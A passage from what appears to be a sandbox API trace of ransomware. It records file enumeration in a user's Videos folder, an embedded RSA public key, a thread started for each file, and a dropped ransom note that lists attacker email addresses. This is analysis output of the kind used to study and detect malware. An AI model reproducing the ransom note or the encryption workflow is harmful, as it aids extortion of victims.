HALPmcxz\\Videos\\") returned 41 [0128.971] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.971] lstrcpyW (in: lpString1=0x17cf1c, lpString2="l0jm8.avi" | out: lpString1="l0jm8.avi") returned="l0jm8.avi" [0128.971] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.971] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x638 [0128.971] Sleep (dwMilliseconds=0x96) [0129.142] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.142] lstrcmpW (lpString1="s2dwcVO_4E6w.flv", lpString2="..") returned 1 [0129.142] lstrcmpW (lpString1="s2dwcVO_4E6w.flv", lpString2=".") returned 1 [0129.142] StrStrW (lpFirst="s2dwcVO_4E6w.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0129.142] StrStrW (lpFirst="s2dwcVO_4E6w.flv", lpSrch="ntldr") returned 0x0 [0129.142] StrStrW (lpFirst="s2dwcVO_4E6w.flv", lpSrch="NTLDR") returned 0x0 [0129.142] StrStrW (lpFirst="s2dwcVO_4E6w.flv", lpSrch="NTDETECT.COM") returned 0x0 [0129.142] StrStrW (lpFirst="s2dwcVO_4E6w.flv", lpSrch="ntdetect.com") returned 0x0 [0129.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0129.142] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0129.142] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0129.142] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.142] lstrcpyW (in: lpString1=0x17cf1c, lpString2="s2dwcVO_4E6w.flv" | out: lpString1="s2dwcVO_4E6w.flv") returned="s2dwcVO_4E6w.flv" [0129.143] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0129.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x65c [0129.143] Sleep (dwMilliseconds=0x96) [0129.298] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.298] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.298] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.298] lstrcmpW (lpString1="zpPjma0L3Hj-_nB.mp4", lpString2="..") returned 1 [0129.298] lstrcmpW (lpString1="zpPjma0L3Hj-_nB.mp4", lpString2=".") returned 1 [0129.298] StrStrW (lpFirst="zpPjma0L3Hj-_nB.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0129.298] StrStrW (lpFirst="zpPjma0L3Hj-_nB.mp4", lpSrch="ntldr") returned 0x0 [0129.298] StrStrW (lpFirst="zpPjma0L3Hj-_nB.mp4", lpSrch="NTLDR") returned 0x0 [0129.298] StrStrW (lpFirst="zpPjma0L3Hj-_nB.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0129.298] StrStrW (lpFirst="zpPjma0L3Hj-_nB.mp4", lpSrch="ntdetect.com") returned 0x0 [0129.298] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0129.299] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0129.299] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0129.299] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.299] lstrcpyW (in: lpString1=0x17cf1c, lpString2="zpPjma0L3Hj-_nB.mp4" | out: lpString1="zpPjma0L3Hj-_nB.mp4") returned="zpPjma0L3Hj-_nB.mp4" [0129.299] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0129.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x66c [0129.299] Sleep (dwMilliseconds=0x96) [0129.474] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.474] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0129.474] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0129.474] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0129.474] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0129.474] FindClose (in: hFindFile=0x3cde358 | out: hFindFile=0x3cde358) returned 1 [0129.474] FindClose (in: hFindFile=0x3cde358 | out: hFindFile=0x3cde358) returned 0 [0129.474] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0129.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0129.474] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0129.474] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0129.474] SetErrorMode (uMode=0x1) returned 0x1 [0129.474] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0129.475] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0129.475] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0129.475] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x664) returned 0x0 [0129.475] RegQueryValueExW (in: hKey=0x664, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cea400, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cea400*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0129.475] RegCloseKey (hKey=0x664) returned 0x0 [0129.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0129.475] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0129.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0129.475] CloseHandle (hObject=0x664) returned 1 [0129.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde358 [0129.475] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="Videos" [0129.476] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0129.476] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0129.476] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0129.476] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.476] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0129.476] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.476] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.476] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.476] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.476] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0129.476] lstrcmpW (lpString1="DTMS 07a7Aq-XEUh0", lpString2="..") returned 1 [0129.476] lstrcmpW (lpString1="DTMS 07a7Aq-XEUh0", lpString2=".") returned 1 [0129.476] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0129.476] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0129.476] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0129.476] SetErrorMode (uMode=0x1) returned 0x1 [0129.476] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0129.476] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.476] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.476] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*" [0129.476] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cde5d8 [0129.509] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0129.509] lstrcpyW (in: lpString1=0x17b644, lpString2="DTMS 07a7Aq-XEUh0" | out: lpString1="DTMS 07a7Aq-XEUh0") returned="DTMS 07a7Aq-XEUh0" [0129.510] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0129.510] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0129.510] lstrcmpW (lpString1="2 mjBTvZEWz.swf", lpString2="..") returned 1 [0129.510] lstrcmpW (lpString1="2 mjBTvZEWz.swf", lpString2=".") returned 1 [0129.510] StrStrW (lpFirst="2 mjBTvZEWz.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0129.510] StrStrW (lpFirst="2 mjBTvZEWz.swf", lpSrch="ntldr") returned 0x0 [0129.510] StrStrW (lpFirst="2 mjBTvZEWz.swf", lpSrch="NTLDR") returned 0x0 [0129.510] StrStrW (lpFirst="2 mjBTvZEWz.swf", lpSrch="NTDETECT.COM") returned 0x0 [0129.510] StrStrW (lpFirst="2 mjBTvZEWz.swf", lpSrch="ntdetect.com") returned 0x0 [0129.510] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0129.510] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0129.510] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0129.510] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.510] lstrcpyW (in: lpString1=0x17be7c, lpString2="2 mjBTvZEWz.swf" | out: lpString1="2 mjBTvZEWz.swf") returned="2 mjBTvZEWz.swf" [0129.510] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.510] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x674 [0129.510] Sleep (dwMilliseconds=0x96) [0129.687] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0129.687] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0129.687] lstrcmpW (lpString1="92y tDp.avi", lpString2="..") returned 1 [0129.687] lstrcmpW (lpString1="92y tDp.avi", lpString2=".") returned 1 [0129.688] StrStrW (lpFirst="92y tDp.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0129.688] StrStrW (lpFirst="92y tDp.avi", lpSrch="ntldr") returned 0x0 [0129.688] StrStrW (lpFirst="92y tDp.avi", lpSrch="NTLDR") returned 0x0 [0129.688] StrStrW (lpFirst="92y tDp.avi", lpSrch="NTDETECT.COM") returned 0x0 [0129.688] StrStrW (lpFirst="92y tDp.avi", lpSrch="ntdetect.com") returned 0x0 [0129.688] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0129.688] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0129.688] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0129.688] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0129.688] lstrcpyW (in: lpString1=0x17be7c, lpString2="92y tDp.avi" | out: lpString1="92y tDp.avi") returned="92y tDp.avi" [0129.688] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0129.688] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0129.688] Sleep (dwMilliseconds=0x96) [0129.847] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0129.848] lstrcmpW (lpString1="ArnUUg6o.mkv", lpString2="..") returned 1 [0129.848] lstrcmpW (lpString1="ArnUUg6o.mkv", lpString2=".") returned 1 [0129.848] StrStrW (lpFirst="ArnUUg6o.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0129.848] StrStrW (lpFirst="ArnUUg6o.mkv", lpSrch="ntldr") returned 0x0 [0129.848] StrStrW (lpFirst="ArnUUg6o.mkv", lpSrch="NTLDR") returned 0x0 [0129.848] StrStrW (lpFirst="ArnUUg6o.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0129.848] StrStrW (lpFirst="ArnUUg6o.mkv", lpSrch="ntdetect.com") returned 0x0 [0129.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="Desktop") returned 0x0 [0129.848] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpSrch="DESKTOP") returned 0x0 [0129.848] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned 59 [0129.848] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 